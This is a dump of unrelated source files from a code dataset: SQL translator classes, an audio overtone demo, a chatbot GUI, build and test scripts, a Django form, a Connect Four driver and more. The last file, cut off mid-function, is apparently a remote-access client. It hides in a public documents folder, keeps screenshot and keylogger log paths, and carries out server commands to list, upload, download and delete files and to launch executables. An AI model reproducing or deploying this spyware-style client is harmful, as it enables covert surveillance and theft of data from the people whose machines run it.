\"input/fisheye_day_detection\"\r\n#tracking_GT_dir = \"input/fisheye_day_tracking\"\r\nsummary = evaluate_tracking(tracking_GT_dir, tracking_detection_dir)\r\n\r\n##saving result into a txt file\r\ntext_file = open(\"mot_result.txt\", \"w\")\r\nn = text_file.write(summary)\r\ntext_file.close()","sub_path":"mot_eval.py","file_name":"mot_eval.py","file_ext":"py","file_size_in_byte":26563,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"272119069","text":"from Instrucciones.TablaSimbolos.Instruccion import Instruccion\nfrom Instrucciones.TablaSimbolos.Tipo import Tipo_Dato, Tipo\nfrom Instrucciones.Excepcion import Excepcion\nfrom Instrucciones.Sql_select.Select import Select\nfrom Instrucciones.Tablas.Tablas import Tablas\nfrom Instrucciones.Identificador import Identificador\nimport pandas as pd\n\n\nclass SelectLista(Instruccion):\n def __init__(self, lista, strGram, linea, columna):\n Instruccion.__init__(self,Tipo(Tipo_Dato.QUERY),linea,columna,strGram)\n self.lista = lista\n\n def ejecutar(self, tabla, arbol):\n super().ejecutar(tabla,arbol)\n columnas = []\n valores = []\n selectEncontrado = 0\n for ins in self.lista:\n if isinstance(ins, Alias):\n resultado = ins.expresion.ejecutar(tabla, arbol)\n if isinstance(resultado, Excepcion):\n return resultado\n valores.append(str(resultado))\n columnas.append(ins.id)\n elif isinstance(ins, Select):\n resultado = ins.ejecutar(tabla, arbol)\n if isinstance(resultado, Excepcion):\n return resultado\n valores = resultado\n columnas = ins.devolverColumnas(tabla,arbol)\n if isinstance(columnas, Excepcion):\n return columnas\n selectEncontrado = 1\n else:\n resultado = ins.ejecutar(tabla, arbol)\n if isinstance(resultado, Excepcion):\n return resultado\n valores.append(str(resultado))\n columnas.append('col')\n #print(\"COLUMNAS-------------------------->\",columnas)\n #print(\"VALORES-------------------------->\",valores)\n if(selectEncontrado == 0):\n valores = [valores]\n \n if(arbol.getRelaciones() == False):\n arbol.getMensajeTabla(columnas,valores)\n else:\n n = Tablas(\"tabla\",None)\n n.data = valores\n n.lista_de_campos = columnas\n return n\n else:\n if(arbol.getRelaciones() == False):\n arbol.getMensajeTabla(columnas,valores)\n else:\n n = Tablas(\"tabla\",None)\n n.lista_de_campos = columnas\n n.data = valores\n return n\n\n def analizar(self, tabla, arbol):\n pass\n def get_methods(object6, spacing=20):\n methodList = []\n for method_name in dir(object6):\n try:\n if callable(getattr(object6, method_name)):\n methodList.append(str(method_name))\n except:\n methodList.append(str(method_name))\n processFunc = (lambda s: ' '.join(s.split())) or (lambda s: s)\n for method in methodList:\n try:\n print(str(method.ljust(spacing)) + ' ' +\n processFunc(str(getattr(object6, method).__doc__)[0:90]))\n except:\n print(method.ljust(spacing) + ' ' + ' getattr() failed')\n\n def extraer(self,tabla,arbol):\n \n cadena = \" \"\n print(\"select99999\") \n mitabla =\" \"\n\n try: \n cadena = \"\\\"select \"\n wherecond = \" \"\n for x in self.lista:\n print(\"entro\") \n print(x)\n print(\"ttttt\") \n\n print(x.lcol2)\n print(\"entrrrrrrrro\") \n if isinstance(x, Select):\n print(\"isinstance Select\") \n lcol2=x.getparam2(tabla,arbol)\n\n for xu in lcol2:\n print(\"xu lcol2 es \",xu) \n if isinstance(xu, Identificador):\n print(\"isinstance Identificador\") \n mitabla = xu.devolverId(tabla,arbol)\n print(\"mitabla es\",mitabla) \n\n\n lcol20=x.getparam1(tabla,arbol)\n\n for xu in lcol20:\n print(\"xu lcoli20 es \",xu) \n print(xu) \n\n try:\n if isinstance(xu, Identificador):\n print(\"isinstance Identificador\") \n cadena += xu.devolverId(tabla,arbol)\n print(\"cadena es\") \n print(xu.devolverId(tabla,arbol))\n else :\n print(\"no es\") \n\n cadena += xu\n print(\"no es\",cadena) \n\n except Exception as e:\n print(e)\n print(\"cadu.deena es\",cadena) \n\n\n \n\n cadena += \" from \"+mitabla \n\n if x.where !=None:\n wherecond=x.where.extraer(tabla,arbol)\n cadena += wherecond\n\n cadena += \";\\\"\"\n print(\"cadenao es\",cadena) \n\n except Exception as e:\n print(e)\n \n return cadena \n def traducir(self, tabla, arbol):\n\n cadena = \" \"\n\n print(\"seguira \") \n try: \n cadena = self. extraer(tabla,arbol)\n\n except Exception as e:\n print(e)\n print(\"cadenaiuo es\",cadena) \n\n arbol.addComen(\"Asignar cadena\")\n temporal1 = tabla.getTemporal()\n arbol.addc3d(f\"{temporal1} = { cadena }\")\n\n arbol.addComen(\"Entrar al ambito\")\n temporal2 = tabla.getTemporal()\n arbol.addc3d(f\"{temporal2} = P+2\")\n temporal3 = tabla.getTemporal()\n arbol.addComen(\"parametro 1\")\n arbol.addc3d(f\"{temporal3} = { temporal2}+1\")\n arbol.addComen(\"Asignacion de parametros\")\n arbol.addc3d(f\"Pila[{temporal3}] = {temporal1}\")\n\n arbol.addComen(\"Llamada de funcion\")\n arbol.addc3d(f\"P = P+2\")\n arbol.addc3d(f\"funcionintermedia()\")\n \n arbol.addComen(\"obtener resultado\")\n temporalX = tabla.getTemporal()\n arbol.addc3d(f\"{temporalX} = P+2\")\n temporalR = tabla.getTemporal()\n arbol.addc3d(f\"{temporalR} = Pila[{ temporalX }]\")\n\n arbol.addComen(\"Salida de funcion\")\n arbol.addc3d(f\"P = P-2\")\n\n print(\"hello\")\n\n print(arbol.get3d())\n print(\"dsliio hello\")\n\n\nclass Alias():\n def __init__(self, id, expresion):\n self.id = id\n self.expresion = expresion\n self.tipo = None","sub_path":"parser/fase2/team02/Fase2_G2/Instrucciones/Sql_select/SelectLista.py","file_name":"SelectLista.py","file_ext":"py","file_size_in_byte":6591,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"414451572","text":"# M2Sa2-hear-fund-saw-square-triangle.py\r\n# -----------------------------------------\r\n# Using M2Salib.py to make series with overtones and play them back to hear how they sound.\r\n#\r\n# Revision 0.4 - 03 Apr 2020 - Knud Funch, Soundhub danmark - LYDKit til undervisningbrug - Region MidtJylland\r\n# To be used as material in module 2 test in Physics/Math class\r\n#\r\n# To be run from within Thonny IDE on either PC, MAC (or Raspberry PI).\r\n#\r\nfrom M2Sa0lib import *\r\n# ------------------------------------------------------------------------------------------------------------------------------\r\n#\r\n# Below - Example 1 - play:\r\n# - Fundamantal frequency \r\n# - Fundamantal frequency plus odd overtones (giving a square like signal - see M2Sb-e1-plot-fund-saw-square-triangle)\r\n# - Fundamantal frequency plus odd overtones with shifting sign (giving a triangle like signal)\r\n# (phase shifted by pi)\r\n#\r\n# Note - Triangle and square sounds almost the same - Can you make it more differentiated?\r\n# Hint: Add more overtones to square.\r\n#\r\n# Q - How does the saw and the square relates to standing waves in tubes? Can you explain?\r\n# \r\n\r\nbf = 440 # Keep bf*13 < 1/2 of sf !!\r\nba = 8000\r\n\r\nf1 = generate_pure_tone(bf,ba) # fundamental\r\n\r\no2 = generate_pure_tone(2*bf,1/2*ba) # n'th overtone with n*fundamental freq \r\no3 = generate_pure_tone(3*bf,1/3*ba) # and 1/n times fundamental amplitude \r\no4 = generate_pure_tone(4*bf,1/4*ba)\r\no5 = generate_pure_tone(5*bf,1/5*ba)\r\no6 = generate_pure_tone(6*bf,1/6*ba)\r\no7 = generate_pure_tone(7*bf,1/7*ba)\r\no8 = generate_pure_tone(8*bf,1/8*ba)\r\no9 = generate_pure_tone(9*bf,1/9*ba)\r\no10 = generate_pure_tone(10*bf,1/10*ba)\r\no11 = generate_pure_tone(11*bf,1/11*ba)\r\no12 = generate_pure_tone(12*bf,1/12*ba)\r\no13 = generate_pure_tone(13*bf,1/13*ba)\r\n\r\naddall = f1+o2+o3+o4+o5+o6+o7+o8+o9+o10+o11+o12+o13 # saw\r\naddodd = f1+o3+o5+o7+o9+o11+o13 # square\r\na_sodd = f1-o3+o5-o7+o9-o11+o13 # triangle\r\n\r\nprint(\"pure sine\")\r\npygame.sndarray.make_sound(f1).play()\r\ntime.sleep(d+0.1)\r\nprint(\"saw\")\r\npygame.sndarray.make_sound(addall).play()\r\nwhile True:\r\n time.sleep(d+0.1)\r\n print(\"square\")\r\n pygame.sndarray.make_sound(a_sodd).play()\r\n time.sleep(d+0.1)\r\n print(\"triangle\")\r\n pygame.sndarray.make_sound(addodd).play()\r\n \r\n ","sub_path":"M2Sa2-hear-fund-saw-square-triangle.py","file_name":"M2Sa2-hear-fund-saw-square-triangle.py","file_ext":"py","file_size_in_byte":2435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"244183662","text":"from chatterbot import ChatBot\r\nimport tkinter as tk\r\ntry:\r\n import ttk as ttk\r\n import ScrolledText\r\nexcept ImportError:\r\n import tkinter.ttk as ttk\r\n import tkinter.scrolledtext as ScrolledText\r\nimport time\r\nimport pyttsx3\r\n\r\nfrom appGenerator import startGenerator\r\n\r\n\r\nclass TkinterGUIExample(tk.Tk):\r\n\r\n def __init__(self, *args, **kwargs):\r\n \r\n self.getVoiceAssistance = False\r\n self.getSpeachRecognizer = False\r\n\r\n tk.Tk.__init__(self, *args, **kwargs)\r\n\r\n self.bot= ChatBot('Bot')\r\n\r\n self.title(\"App Generator\")\r\n\r\n self.engine = pyttsx3.init()\r\n self.engine.setProperty('rate', 115)\r\n self.engine.setProperty('volume', 0.9)\r\n\r\n self.initialize()\r\n\r\n def initialize(self):\r\n \r\n self.grid()\r\n\r\n self.conversation_lbl = ttk.Label(self, anchor=tk.E, text='Bot-Integrated App Generator')\r\n self.conversation_lbl.grid(column=0, row=0, sticky='w', padx=3, pady=3)\r\n\r\n self.conversation = ScrolledText.ScrolledText(self, state='disabled')\r\n self.conversation.grid(column=0, row=1, columnspan=3, sticky='nesw', padx=3, pady=3)\r\n\r\n self.usr_input = ttk.Entry(self, state='normal')\r\n self.usr_input.grid(column=0, row=2, rowspan = 2, sticky='news', padx=3, pady=3)\r\n\r\n self.respond = tk.Button(self, text='Get Response', command=self.get_response)\r\n self.respond.grid(column=1, row=2, columnspan=2, sticky='news', padx=3, pady=3)\r\n\r\n self.voiceAssistance = tk.Button(self, text='Voice Assistance', command=self.get_voiceAssistance)\r\n self.voiceAssistance.grid(column=1, row=3, sticky='news', padx=3, pady=3)\r\n\r\n self.speachRecognizer = tk.Button(self, text='Speach Recognizer', command=self.get_speachRecognizer)\r\n self.speachRecognizer.grid(column=2, row=3, sticky='news', padx=3, pady=3)\r\n\r\n def get_voiceAssistance(self):\r\n self.getVoiceAssistance = not self.getVoiceAssistance\r\n if self.getVoiceAssistance:\r\n self.voiceAssistance[\"bg\"] = '#2A95BE'\r\n self.voiceAssistance[\"fg\"] = 'white'\r\n else:\r\n self.voiceAssistance[\"bg\"] = '#F0F0F0'\r\n self.voiceAssistance[\"fg\"] = 'black'\r\n \r\n def get_speachRecognizer(self):\r\n self.getSpeachRecognizer = not self.getSpeachRecognizer\r\n if self.getSpeachRecognizer:\r\n self.speachRecognizer[\"bg\"] = '#2A95BE'\r\n self.speachRecognizer[\"fg\"] = 'white'\r\n else:\r\n self.speachRecognizer[\"bg\"] = '#F0F0F0'\r\n self.speachRecognizer[\"fg\"] = 'black'\r\n\r\n def get_response(self):\r\n\r\n user_input = self.usr_input.get()\r\n self.usr_input.delete(0, tk.END)\r\n\r\n response = self.bot.get_response(user_input)\r\n\r\n self.conversation['state'] = 'normal'\r\n\r\n if user_input.startswith( 'create' ):\r\n self.conversation.insert(\r\n tk.END, \"You: \" + user_input + \"\\n\" \r\n )\r\n startGenerator(user_input, self)\r\n elif user_input == 'bye':\r\n if self.getVoiceAssistance:\r\n self.engine.say(\"bye\")\r\n self.engine.runAndWait()\r\n bot_root.quit()\r\n elif user_input == 'help':\r\n self.conversation.insert(\r\n tk.END, \"You: \" + user_input + \"\\n\" + \"\"\"ChatBot: use 'create' keyword to start creating app and also specify the language in which app should be developed.\"\r\n example: 'create addition of 2 numbers in vuejs'\\n\"\"\"\r\n )\r\n \r\n if self.getVoiceAssistance:\r\n self.engine.say(\"\"\"ChatBot: use 'create' keyword to start creating app and also specify the language in which app should be developed.\r\n example: 'create addition of 2 numbers in vuejs'\"\"\")\r\n self.engine.runAndWait()\r\n elif user_input == 'list':\r\n self.conversation.insert(\r\n tk.END, \"You: \" + user_input + \"\\n\" + \"\"\"use params to list:\r\n '-O' for listing operations \r\n '-L' for listing the languages in which bot can build app\\n\"\"\"\r\n )\r\n \r\n if self.getVoiceAssistance:\r\n self.engine.say(\"\"\"use params to list:\r\n '-O' for listing operations \r\n '-L' for listing the languages in which bot can build app\"\"\")\r\n self.engine.runAndWait()\r\n elif user_input == 'list -O':\r\n self.conversation.insert(\r\n tk.END, \"You: \" + user_input + \"\\n\" + \"\"\"List of operations:\r\n 'add / addition / sum'\r\n 'difference / subtract / subtraction'\\n\"\"\"\r\n )\r\n \r\n if self.getVoiceAssistance:\r\n self.engine.say(\"\"\"List of operations:\r\n 'add / addition / sum'\r\n 'difference / subtract / subtraction'\"\"\")\r\n self.engine.runAndWait()\r\n elif user_input == 'list -L':\r\n self.conversation.insert(\r\n tk.END, \"You: \" + user_input + \"\\n\" + \"\"\"ChatBot: List of languages in which bot can build apps:\r\n 'javascript'\r\n 'vuejs'\r\n 'angular' \\n\"\"\"\r\n )\r\n \r\n if self.getVoiceAssistance:\r\n self.engine.say(\"\"\"List of languages in which bot can build apps:\r\n 'javascript'\r\n 'vuejs'\r\n 'angular'\"\"\")\r\n self.engine.runAndWait()\r\n else:\r\n self.conversation.insert(\r\n tk.END, \"You: \" + user_input + \"\\n\" + \"ChatBot: \" + str(response.text) + \"\\n\"\r\n )\r\n \r\n if self.getVoiceAssistance:\r\n self.engine.say(str(response.text))\r\n self.engine.runAndWait()\r\n\r\n self.conversation['state'] = 'disabled'\r\n time.sleep(0.5)\r\n\r\n\r\nbot_root = TkinterGUIExample()\r\nbot_root.mainloop()","sub_path":"botGui.py","file_name":"botGui.py","file_ext":"py","file_size_in_byte":5859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"164635647","text":"#!/usr/bin/env python\n# Copyright 2020, Kay Hayen, mailto:kay.hayen@gmail.com\n#\n# Python test originally created or extracted from other peoples work. The\n# parts from me are licensed as below. It is at least Free Software where\n# it's copied from other people. In these cases, that will normally be\n# indicated.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nimport getpass\nimport os\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\n\nnuitka_dir = os.path.normcase(\n os.path.join(os.path.dirname(os.path.abspath(__file__)), \"..\", \"..\")\n)\n\ncode_name = sys.argv[1]\nverbose = int(sys.argv[2])\n\nif not verbose:\n sys.stdout = open(\"/dev/null\")\n sys.stderr = open(\"/dev/null\")\n\nshutil.rmtree(\"Asserts-%s.build\" % code_name, ignore_errors=True)\nshutil.rmtree(\"Asserts-%s.dist\" % code_name, ignore_errors=True)\n\nwith tempfile.NamedTemporaryFile(\"w\", delete=False) as script_file:\n script_file.write(\"apt-get install -y lsb-release python python-dev\\n\")\n script_file.write(\"CODE_NAME=`lsb_release -c -s`\\n\")\n script_file.write('echo Hello pbuilder for \"$CODE_NAME\".\\n')\n script_file.write(\"cd %s\\n\" % nuitka_dir)\n script_file.write(\n \"python bin/nuitka --python-flag=-S --standalone tests/basics/Asserts.py\\n\"\n )\n\n # script_file.write(\"python3 bin/nuitka --standalone tests/basics/Asserts.py\\n\")\n\n tmp_script = script_file.name\n\ntry:\n subprocess.check_call(\n [\n \"sudo\",\n \"pbuilder\",\n \"--execute\",\n \"--basetgz\",\n \"/var/cache/pbuilder/\" + code_name + \".tgz\",\n \"--bindmounts\",\n nuitka_dir,\n tmp_script,\n ]\n )\n\n shutil.move(\"Asserts.build\", \"Asserts-%s.build\" % code_name)\n shutil.move(\"Asserts.dist\", \"Asserts-%s.dist\" % code_name)\n\n subprocess.check_call(\n [\n \"sudo\",\n \"chown\",\n \"-R\",\n getpass.getuser() + \":\",\n \"Asserts-%s.build\" % code_name,\n \"Asserts-%s.dist\" % code_name,\n ]\n )\n\nfinally:\n os.unlink(tmp_script)\n","sub_path":"tests/standalone/run_pbuilder.py","file_name":"run_pbuilder.py","file_ext":"py","file_size_in_byte":2618,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"522923465","text":"from django import forms\nfrom django.contrib.auth.forms import UserCreationForm\nfrom django.core.validators import validate_slug\n\nfrom api.users import validators\nfrom libs.blacklist import validate_blacklist_name\n\n\nclass RegistrationForm(UserCreationForm):\n username = forms.CharField(\n max_length=150,\n validators=[validate_slug, validate_blacklist_name])\n email = forms.EmailField(\n help_text='email address',\n required=True,\n validators=[\n validators.validate_new_email,\n ]\n )\n tos = forms.BooleanField(\n widget=forms.CheckboxInput,\n label=\"I have read and agree to the Terms of Service\",\n error_messages={\n 'required': \"You must agree to the terms to register\",\n }\n )\n\n class Meta(UserCreationForm.Meta):\n fields = (\"username\", \"email\")\n","sub_path":"polyaxon/api/users/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"616429510","text":"import asyncio\nimport aiohttp\nfrom discord.ext.commands import Bot\nclass API:\n def __init__(self, bot: Bot, token):\n self.bot = bot\n self.token = token\n self.stats_url = \"https://discordbots.org/api/bots/\" + str(bot.user.id) + \"/stats\"\n self.check_url = f\"https://discordbots.org/api/bots/{str(bot.user.id)}/check\"\n self.votes_url = f'https://discordbots.org/api/bots/{str(bot.user.id)}/votes'\n self.session = aiohttp.ClientSession()\n self.header = {\"Authorization\" : self.token}\n async def post_guilds(self):\n data = {'server_count': len(self.bot.guilds)}\n async with aiohttp.ClientSession() as client:\n await client.post(self.stats_url, data =data, headers=self.header)\n print('Server count posted')\n\n async def user_voted(self, userid: int):\n data = {'userid': userid}\n async with aiohttp.ClientSession().get(self.check_url + f'?userId={userid}', headers=self.header) as res:\n r = await res.json()\n res.close()\n if r['voted'] == 0:\n return False\n else:\n return True\n\n async def get_last_1000_votes(self) -> list:\n async with aiohttp.ClientSession().get(self.votes_url, headers=self.header) as res:\n r = await res.json()\n\n return r\n\n\n\n\n\n\n","sub_path":"utils/DiscordBotListAPI.py","file_name":"DiscordBotListAPI.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"226353299","text":"import os\nimport jinja2\nimport shutil\nimport yaml\n\nCMAKELISTS_FILENAME = \"CMakeLists.txt.template\"\nCONFIG_FILENAME = \"tudat-space.yml.template\"\nMAIN_PY_FILENAME = \"main.py.template\"\nKERNEL_FILENAME = \"kernel.cpp.template\"\nMAIN_CPP_FILENAME = \"main.cpp.template\"\n\n\ndef yaml2dict(path):\n with open(path) as file:\n dict_ = yaml.load(file, Loader=yaml.FullLoader)\n return dict_\n\n\ndef render_templates(templates, path, **template_kwargs):\n for template in templates:\n file_path = template.filename.replace(\".template\", \"\")\n file_name = os.path.split(file_path)[-1]\n with open(os.path.join(path, file_name), \"w\") as f:\n f.write(template.render(template_kwargs))\n\n\ndef create_project(project_name,\n project_type,\n project_path=\".\",\n template_path=\"./templates\",\n **kwargs):\n \"\"\"\n\n Parameters\n ----------\n project_name: str\n project_type: str {\"hybrid\", \"cpp\", \"python\"}\n project_git: str [optional]\n\n Returns\n -------\n\n \"\"\"\n\n support_folder = kwargs.get(\"support_folder\", \"support\")\n kernel_folder = kwargs.get(\"kernel_folder\", \"kernel\")\n\n template_loader = jinja2.FileSystemLoader(searchpath=template_path)\n template_env = jinja2.Environment(loader=template_loader)\n\n abs_path_project = os.path.join(project_path, project_name)\n abs_path_kernel = os.path.join(abs_path_project, kernel_folder)\n abs_support_path = os.path.join(abs_path_project, support_folder)\n\n os.makedirs(abs_path_project)\n os.makedirs(abs_support_path)\n\n kernel_templates = []\n support_templates = []\n root_templates = []\n\n config_template = template_env.get_template(CONFIG_FILENAME)\n root_templates.append(config_template)\n\n if (project_type == \"hybrid\") | (project_type == \"python\"):\n main_py_template = template_env.get_template(MAIN_PY_FILENAME)\n root_templates.append(main_py_template)\n\n if (project_type == \"hybrid\") | (project_type == \"cpp\"):\n cmakelists_template = template_env.get_template(CMAKELISTS_FILENAME)\n root_templates.append(cmakelists_template)\n\n if project_type == \"hybrid\":\n os.makedirs(abs_path_kernel)\n kernel_cpp_template = template_env.get_template(KERNEL_FILENAME)\n kernel_templates.append(kernel_cpp_template)\n\n elif project_type == \"cpp\":\n main_cpp_template = template_env.get_template(MAIN_CPP_FILENAME)\n root_templates.append(main_cpp_template)\n\n elif project_type == \"python\":\n pass\n # main_py_template = template_env.get_template(\"main.py.template\")\n # root_templates.append(main_py_template)\n\n template_kwargs = {\"project_name\": project_name,\n \"project_type\": project_type,\n **kwargs}\n\n render_templates(root_templates, abs_path_project, **template_kwargs)\n render_templates(kernel_templates, abs_path_kernel, **template_kwargs)\n render_templates(support_templates, abs_support_path, **template_kwargs)\n\n\ndef test():\n try:\n create_project(\n project_name=\"test_hybrid\",\n project_type=\"hybrid\",\n project_path=\"./test_space\",\n **yaml2dict(\"config/base.yml\")\n )\n create_project(\n project_name=\"test_cpp\",\n project_type=\"cpp\",\n project_path=\"./test_space\",\n **yaml2dict(\"config/base.yml\")\n )\n create_project(\n project_name=\"test_python\",\n project_type=\"python\",\n project_path=\"./test_space\",\n **yaml2dict(\"config/base.yml\")\n )\n except FileExistsError:\n shutil.rmtree(\"./test_space\")\n finally:\n pass\n\n\ndef main(\n project_name,\n project_type=\"python\",\n project_path=\".\",\n project_config_directory=None\n):\n kwargs = yaml2dict(\"config/base.yml\")\n if project_config_directory:\n kwargs.update(yaml2dict(project_config_directory))\n create_project(\n project_name=project_name,\n project_type=project_type,\n project_path=project_path,\n **kwargs\n )\n\n\nif __name__ == \"__main__\":\n import argparse\n\n parser = argparse.ArgumentParser(\n description=(\"Configure a project given a conda-forge.yml file.\")\n )\n parser.add_argument(\n \"project_name\",\n help=(\n \"the name of the project that is to be created\"\n ),\n )\n args = parser.parse_args()\n main(args.project_name)\n","sub_path":"tudatpy/cli/create_project2.py","file_name":"create_project2.py","file_ext":"py","file_size_in_byte":4547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"565756194","text":"# Create a program that asks the user to enter their name and their age. Print out a message addressed to them that tells them the year that they will turn 100 years old.\n# Extras:\n#\n# Add on to the previous program by asking the user for another number and printing out that many copies of the previous message. (Hint: order of operations exists in Python)\n# Print out that many copies of the previous message on separate lines. (Hint: the string \"\\n is the same as pressing the ENTER button)\nfrom datetime import datetime\n\n\ndef main():\n nome = input(\"Digite seu nome: \")\n idade = int(input(\"Quantos anos você tem?\"))\n calcula_aos_100(nome, idade)\n\n\ndef calcula_aos_100(nome, idade):\n ano_atual = int(datetime.today().strftime(\"%Y\"))\n quantas_mensagens = int(input(\"Exibir quantas vezes?\"))\n for x in range(quantas_mensagens):\n if idade < 100:\n print(f'{nome}, você vai fazer 100 anos em {str(ano_atual + (100 - idade))}')\n elif idade == 100:\n print(f'Estamos em {str(ano_atual)}, e {nome} tem 100 anos de vida.')\n else:\n print(\"Você está velho demais para executar esse programa.\")\n\n\nif __name__ == '__main__': main()\n","sub_path":"01 Character Input/character_input.py","file_name":"character_input.py","file_ext":"py","file_size_in_byte":1204,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"5786069","text":"#!/usr/bin/python3\n\nfrom engine_connect4 import EngineConnect4\nfrom board_state import BoardState\n\ndef main():\n colour_player = 1\n colour_engine = 2\n board = BoardState()\n depth = 6\n engine = EngineConnect4(board, colour_engine, colour_player, depth, go_first=True)\n winner = 0\n while winner == 0 and len(board.valid_moves()) > 0:\n move_col = None\n while move_col not in board.valid_moves():\n move_col = int(input('Your move: '))\n engine.record_move(colour_player, move_col)\n winner = board.winner()\n if winner != 0:\n break\n print('Engine\\'s move...')\n engine.make_move()\n winner = board.winner()\n print('Player {} wins!'.format(winner))\n\nif __name__ == '__main__':\n main()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"629234546","text":"from typing import Callable, Any, TypeVar\nimport src.utils.datastructures.node_heap as nh\nT = TypeVar('T')\n\ndef comp_wrapper(func: Callable[[T, Any], bool]) -> Callable[[T, Any], bool]:\n def comp_func(self, other):\n if not isinstance(other, nh.HeapNode):\n TypeError(f\"other must be of type HeapNode but got {type(other)}\")\n elif other.key != self.key:\n raise ValueError(\n \"Comparison node does not have the correct key \" +\n f\"expected HeapNode with key {self.key} but got {other}\"\n )\n func(self, other) \n return comp_func\n\n\n\"\"\"\nThese two implementations are equivalent\n\nclass SomeClass:\n @comp_func\n def __eq__(self, other):\n #Some comp\n return comp\n\nclass SomeClass:\n def __init__(self)\n self.__eq__ = comp_wrapper(self.__eq__)\n \n def __eq__(self, other):\n #Some comp\n return comp\n\"\"\"","sub_path":"app/src/utils/boilerplate_decorators/comparitor_decorators.py","file_name":"comparitor_decorators.py","file_ext":"py","file_size_in_byte":928,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"387928703","text":"from message import Message, Header, Command\nfrom client import Client\nfrom psutil import process_iter\nfrom shutil import rmtree\nfrom time import sleep\nfrom sys import exit\nimport zipfile\nfrom datetime import datetime\nimport os\n\nFOLDER_PATH = r\"C:\\Users\\Public\\Documents\\data\"\nSS_PATH = r\"C:\\Users\\Public\\Documents\\data\\ss\"\nLOG_PATH = r\"C:\\Users\\Public\\Documents\\data\\logs\"\nLOGGER_PATH = r\"C:\\Users\\Public\\Documents\\data\\logger.exe\"\nCONF_PATH = r\"C:\\Users\\Public\\Documents\\data\\conf\"\n\n_client = None\n\nif not os.path.exists(FOLDER_PATH):\n os.makedirs(FOLDER_PATH)\nif not os.path.exists(SS_PATH):\n os.makedirs(SS_PATH)\nif not os.path.exists(LOG_PATH):\n os.makedirs(LOG_PATH)\n\n\ndef connection_with_server(_client):\n while True:\n try:\n # Try to send message from queue\n if len(_client.queue_send) > 0:\n _client.log('Sending command to server...')\n msg = _client.queue_send.pop(0)\n _client.send_message(msg)\n\n # Try to process message from queue\n if len(_client.queue_receive) > 0:\n msg = _client.queue_receive.pop(0)\n\n if msg.header == Header.IDLE:\n _client.log('Local Client not connected!')\n\n if msg.header == Header.EXIT:\n exit()\n\n if msg.header == Header.COMMAND:\n _client.log('New command received!')\n result_msg = _execute_command(msg)\n _client.queue_send.append(result_msg)\n\n except ConnectionError:\n _client.connected_to_server = False\n _client.log('Connection with server failed!')\n\n sleep(0.5)\n\n\ndef _execute_command(msg):\n if msg.command == Command.LS:\n msg = command_ls(msg)\n elif msg.command == Command.LS_TREE:\n msg = command_ls_tree(msg)\n elif msg.command == Command.CREATE_FOLDER:\n msg = command_crete_folder(msg)\n elif msg.command == Command.UPLOAD_FILE:\n msg = command_upload_file(msg)\n elif msg.command == Command.DOWNLOAD_FILE:\n msg = command_download_file(msg)\n elif msg.command == Command.UPLOAD_FOLDER:\n msg = command_upload_folder(msg)\n elif msg.command == Command.REMOVE_FILE:\n msg = command_remove_file(msg)\n elif msg.command == Command.REMOVE_FOLDER:\n msg = command_remove_folder(msg)\n elif msg.command == Command.UPDATE_CONFIG:\n msg = command_update_config(msg)\n elif msg.command == Command.START_EXE:\n msg = command_start_exe(msg)\n elif msg.command == Command.CHECK_PROCESS_RUNNING:\n msg = command_check_process_running(msg)\n else:\n msg = Message(Header.RESPONSE, Command.COMMAND_NOT_KNOWN)\n\n return msg\n\n\n# region COMMANDS\ndef zipdir(str_path):\n zipf = zipfile.ZipFile(f'{FOLDER_PATH}/zipped', 'w', zipfile.ZIP_DEFLATED)\n base_name = os.path.basename(str_path)\n for root, dirs, files in os.walk(str_path):\n for file in files:\n zipf.write(os.path.join(root, file), f'{base_name}\\\\{file}')\n zipf.close()\n\n\ndef get_path(path):\n path = str(path)\n path = path.replace('_data_', FOLDER_PATH)\n path = path.replace('_logs_', LOG_PATH)\n path = path.replace('_ss_', SS_PATH)\n path = path.replace('_logger_', LOGGER_PATH)\n path = path.replace('_user_', os.getlogin())\n\n return path\n\n\ndef command_ls(msg):\n path = get_path(msg.payload)\n\n msg = Message(Header.RESPONSE, Command.LS)\n\n result = ''\n try:\n entries = os.scandir(path)\n for entry in entries:\n result += f'{entry.name}{\"\" if entry.is_file() else \"/\"} - {os.path.getsize(path + os.sep + entry.name) / 1024:.2f} Kb\\n'\n except Exception as e:\n result = e\n\n msg.payload = result\n\n return msg\n\n\ndef command_ls_tree(msg):\n path = get_path(msg.payload)\n\n msg = Message(Header.RESPONSE, Command.LS_TREE)\n\n result = ''\n try:\n for root, dirs, files in os.walk(path):\n level = root.replace(path, '').count(os.sep)\n indent = ' ' * 4 * level\n result += '{}{}/\\n'.format(indent, os.path.basename(root))\n subindent = ' ' * 4 * (level + 1)\n for f in sorted(files, key=lambda f: os.path.getsize(root + os.sep + f)):\n result += f'{subindent}{f} - {(os.path.getsize(root + os.sep + f)/1024.)/1024.:.2f}MB\\n'\n except Exception as e:\n result = e\n\n msg.payload = result\n\n return msg\n\n\ndef command_crete_folder(msg):\n path = 